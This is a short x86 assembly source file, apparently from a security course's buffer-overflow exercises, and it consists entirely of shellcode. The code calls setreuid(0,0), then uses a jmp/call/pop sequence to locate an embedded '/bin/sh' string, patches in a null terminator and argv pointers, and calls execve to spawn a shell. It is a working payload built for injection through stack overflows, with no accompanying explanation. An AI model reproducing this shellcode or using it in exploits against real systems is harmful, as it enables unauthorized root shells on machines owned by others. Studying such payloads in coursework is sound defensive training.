c_seguridad/code/bof/shellex.asm


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

SECTION .text
global _start
_start:
	xor		eax, eax
	mov		al, 70
	xor		ebx, ebx
	xor		ecx, ecx
	int		0x80

	jmp short ender

starter:
	xor		eax, eax
	pop		ebx
	mov		[ebx+7], al
	mov		[ebx+8], ebx
	mov		[ebx+12], eax
	mov		al, 11
	lea		ecx, [ebx+8]
	lea		edx, [ebx+12]
	int		0x80

ender:
	call starter
	db "/bin/shNAAAABBBB"